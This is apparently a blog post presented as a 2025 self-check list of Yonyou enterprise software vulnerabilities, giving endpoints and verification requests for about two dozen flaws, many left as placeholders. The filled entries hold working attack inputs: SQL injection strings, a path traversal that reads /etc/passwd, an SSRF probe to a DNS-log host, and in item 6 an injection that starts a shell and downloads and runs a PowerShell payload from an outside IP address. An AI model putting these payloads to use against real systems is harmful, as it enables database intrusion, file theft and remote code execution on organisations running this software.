Yonyou Vulnerability Self-Check List (2025)

  1. Yonyou NC listUserSharingEvents SQL injection

    1. Vulnerability type: SQL injection
    2. Exploit path: /portal/pt/oacoSchedulerEvents/listUserSharingEvents
    3. Verification method: /portal/pt/oacoSchedulerEvents/listUserSharingEvents?agent=6')+AND+1=UTL_INADDR.GET_HOST_ADDRESS('~'||(user)||'~')--&pageId=login&sch_ed=2&sch_sd=1
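  2. Yonyou BIP remote code execution

    1. Vulnerability type: RCE
    2. Exploit path: to be added
    3. Verification method: to be added
  3. Yonyou Chanjet T+ InitContext login bypass vulnerability

    1. Vulnerability type: Broken access control
    2. Exploit path: to be added
    3. Verification method: to be added
  4. Yonyou Chanjet T+ GetAll sensitive information disclosure vulnerability

    1. Vulnerability type: Information disclosure
    2. Exploit path: to be added
    3. Verification method: to be added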
  5. Yonyou Chanjet CRM newleadset.php SQL injection

    1. Vulnerability type: SQL injection
    2. Exploit path: /lead/newleadset.php
    3. Verification method: /lead/newleadset.php?gblOrgID=1+AND+%28SELECT+5244+FROM+%28SELECT%28SLEEP%289%29%29%29HAjH%29--+-&DontCheckLogin=1
  6. Yonyou Chanjet T+ Load SQL injection

    1. Vulnerability type: SQL injection
    2. Exploit path: //tplus/UFAQD/KeyInfoList.aspx
    3. Verification method: //tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=%27);declare%20%40shell%20int%3Bexec%20sp_oacreate%20%22wscript.shell%22%2C%40shell%20output%3Bexec%20sp_oamethod%20%40shell%2C%22run%22%2Cnull%2C%22sqlps%20IEX%20((new-object%20net.webclient).downloadstring('http%3A%2F%2F103.199.106.62%3A6000%2Fbeta'))%22%3b--+
  7. Yonyou Chanjet T+ keyEdit.aspx SQL injection

    1. Vulnerability type: SQL injection
    2. Exploit path: /tplus/UFAQD/keyEdit.aspx
    3. Verification method: GET /tplus/UFAQD/keyEdit.aspx?KeyID=222%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
  8. Yonyou Chanjet AddressSettingController SSRF

    1. Vulnerability type: SSRF
    2. Exploit path: /tplus/ajaxpro/Ufida.T.SM.UIP.UA.AddressSettingController,Ufida.T.SM.UIP.ashx
    3. Verification method:
      POST /tplus/ajaxpro/Ufida.T.SM.UIP.UA.AddressSettingController,Ufida.T.SM.UIP.ashx?method=TestConnnect HTTP/1.1
      Host:
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
      Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
      Accept-Encoding: gzip, deflate
      Connection: close
      Cookie: ASP.NET_SessionId=sfzg0pgxvld3ltgimecqkjg4; Hm_lvt_fd4ca40261bc424e2d120b806d985a14=1721822405; Hm_lpvt_fd4ca40261bc424e2d120b806d985a14=1721822415; HMACCOUNT=AFE08148BD092161
      Upgrade-Insecure-Requests: 1
      Priority: u=0, i
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 36
      
      {
        "address":"bftsce.dnslog.cn"
      }
      

       

  9. Yonyou Chanjet TPLUS AccountClearControler SQL injection

    1. Vulnerability type: SQL injection
    2. Vulnerable path: /tplus/ajaxpro/Ufida.T.SM.UIP.Tool.AccountClearControler,Ufida.T.SM.UIP.ashx
    3. Verification method: /tplus/ajaxpro/Ufida.T.SM.UIP.Tool.AccountClearControler,Ufida.T.SM.UIP.ashx?method=GetisInitBCRetail
  10. Yonyou Shikong KSOA SQL injection

    1. Vulnerability type: SQL injection
    2. Vulnerable path: /worksheet/workslist.jsp
    3. Verification method: /worksheet/workslist.jsp?id=1';WAITFOR+DELAY+'0:0:3
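  11. Yonyou NC deleteEvent SQL injection

    1. Vulnerability type: SQL injection
    2. Vulnerable path: /portal/pt/oacoSchedulerEvents/deleteEvent
    3. Verification method: to be confirmed
  12. Yonyou NC getFormItem doPost SQL injection

    1. Vulnerability type: SQL injection
    2. Vulnerable path: /portal/pt/servlet/getFormItem/doPost
    3. Verification method: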
      POST /portal/pt/servlet/getFormItem/doPost?pageId=login&clazz=nc.uap.wfm.vo.base.ProDefBaseVO&proDefPk=1 HTTP/1.1
      Host: 
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
      Content-Length: 19
      

        

  13. Yonyou U9 Cloud print/DynamaticExport.aspx endpoint arbitrary file download

    1. Vulnerability type: Arbitrary file read
    2. Vulnerable path: /Portal/Print/DynamaticExport.aspx
    3. Verification method: /Portal/Print/DynamaticExport.aspx?filePath=../../etc/passwd
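  14. Yonyou Nccloud system deserialization vulnerability

    1. Vulnerability type:
    2. Vulnerable path:
    3. Verification method:
  15. Yonyou NC IMetaWebService4BqCloud data source SQL injection

    1. Vulnerability type: SQL injection
    2. Vulnerable path: /uapws/service/uap.pubitf.ae.meta.IMetaWebService4BqCloud
    3. Verification method: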
      POST /uapws/service/uap.pubitf.ae.meta.IMetaWebService4BqCloud HTTP/1.1
      Cache-Control: max-age=0
      Upgrade-Insecure-Requests: 1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
      Accept-Encoding: gzip, deflate, br
      Accept-Language: zh-CN,zh;q=0.9
      Cookie: JSESSIONID=09133CFE3A7B0CE8341AB1A7DEDFCCDE.server
      Connection: keep-alive
      SOAPAction: urn:loadFields
      Content-Type: text/xml;charset=UTF-8
      Host: 
      Content-Length: 350

      <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:imet="http://meta.ae.pubitf.uap/IMetaWebService4BqCloud">
      <soapenv:Header/>
      <soapenv:Body>
      <imet:loadFields>         <!--type: string-->         
      <imet:string>SmartModel^1';*</imet:string>      
      </imet:loadFields>   
      </soapenv:Body>
      </soapenv:Envelope>

        

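  16. Yonyou U9 Cloud remote code execution

    1. Vulnerability type: RCE
    2. Vulnerable path: hard-coded MachineKey
    3. Verification method: hard-coded MachineKey; construct a ViewState deserialization
  17. Yonyou YonBIP (R6 Flagship Edition) arbitrary user password reset

    1. Vulnerability type: Broken access control
    2. Vulnerable path: to be confirmed
    3. Verification method: to be confirmed
  18. Yonyou U9 Cloud PDFDirectPrint.aspx deserialization

    1. Vulnerability type: Deserialization
    2. Vulnerable path: to be confirmed
    3. Verification method: to be confirmed
  19. Yonyou U8 Cloud QuerySoapServlet SQL injection

    1. Vulnerability type: SQL injection
    2. Vulnerable path: QuerySoapServlet
    3. Verification method: to be confirmed
  20. Yonyou nmc service arbitrary file upload

    1. Vulnerability type: File upload
    2. Vulnerable path: to be confirmed
    3. Verification method: to be confirmed
  21. Yonyou NC baplink SQL injection

    1. Vulnerability type: SQL injection
    2. Vulnerable path: /portal/pt/baplink/content
    3. Verification method: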
      GET /portal/pt/baplink/content?pageId=login&pk_funnode=-1* HTTP/1.1
      Host: 
      Accept-Encoding: identity
      User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1
      Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
      

        

 

posted @ 2025-07-27 10:49  r1ch4rd_L